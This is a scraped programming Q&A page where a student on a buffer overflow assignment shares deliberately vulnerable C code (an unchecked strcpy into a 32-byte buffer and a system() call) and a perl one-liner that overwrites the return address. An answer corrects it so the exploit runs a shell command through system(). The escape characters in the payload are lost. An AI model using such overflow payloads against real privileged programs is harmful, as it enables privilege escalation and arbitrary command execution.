Welcome to ShenZhenJia Knowledge Sharing Community for programmer and developer-Open, Learning and Share
menu search
person
Welcome To Ask or Share your Answers For Others

Categories

I'm doing a buffer overflow assignment and I'm stuck on the syntax for this command:

$ ./script $(perl -e 'print "A" x 36 . "x40x83x04x08"' | touch test.txt)

We're expected to use this one liner instead of a shell. The return address is correct and it takes me to the correct place in the assembly, but when I run this, the functions execute as the standard user, instead of running as root.

From what I gather, the issue is either syntax or quotation marks.

How could I correct the one liner?

Source for Script

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

char arg1[60];
char arg2[60];

void func(char *s){
    char buf[32];
    strcpy(buf, s);
    
    printf("you entered: %s
", buf);
}

void secret(){
  system(arg2);
}

int main(int argc, char *argv[]){
    if(argc < 2){
        printf("Usage: %s some_string
", argv[0]);
        return 2;
    }
    strcpy(arg1, argv[1]);

    if (argc == 3) {
      strcpy(arg2, argv[2]);
    }
      
    func(argv[1]);
    return 0;
}

与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
thumb_up_alt 0 like thumb_down_alt 0 dislike
4.4k views
Welcome To Ask or Share your Answers For Others

1 Answer

I think you the part that says | touch test.txt) is not needed.

./script $(perl -e 'print "A" x 36 . "x40x83x04x08"') "touch test.txt"

should work.

I am not sure why you are piping the output of the shell script to the touch command (I am assuming the buffer overflow you want to exploit is in the script, and it ends up somehow using the second argument as a parameter to a function).

As in terms of why it's being executed as normal user, in your scenario, your shell was running touch as a normal user. What I think you want to do is run your script as root (either by making it a setuid binary or just running the program with sudo, and make the script actually perform the call to system("touch ...");.


与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
thumb_up_alt 0 like thumb_down_alt 0 dislike
Welcome to ShenZhenJia Knowledge Sharing Community for programmer and developer-Open, Learning and Share
...